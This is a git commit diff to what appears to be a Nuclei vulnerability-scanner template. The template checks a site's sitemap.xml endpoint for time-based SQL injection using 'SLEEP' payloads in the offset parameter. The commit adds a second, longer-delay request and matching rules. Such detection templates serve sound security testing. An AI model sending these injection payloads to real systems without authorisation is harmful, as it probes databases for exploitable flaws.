Update sitemap-sql-injection.yaml

patch-1
J4vaovo 2023-07-09 16:17:26 +08:00 committed by GitHub
parent a676ce2234
commit a068bf6283
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 4 deletions

View File

@ -2,7 +2,7 @@ id: sitemap-sql-injection
info: info:
name: Sitemap - SQL Injection name: Sitemap - SQL Injection
author: Aravind author: Aravind,j4vaovo
severity: high severity: high
reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19 reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19
metadata: metadata:
@ -17,10 +17,23 @@ http:
POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1 POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- |
@timeout: 25s
POST /sitemap.xml?offset=1;SELECT IF((SLEEP(16)),1,2356)# HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'duration>=6' - 'duration_1>=6'
- 'status_code == 200' - 'status_code_1 == 200'
- 'contains(header, "application/xml") && contains(body, "sitemap>")' - 'contains(body_1, "sitemap>")'
condition: and
- type: dsl
dsl:
- 'duration_2>=16'
- 'status_code_2 == 200'
- 'contains(body_2, "sitemap>")'
condition: and condition: and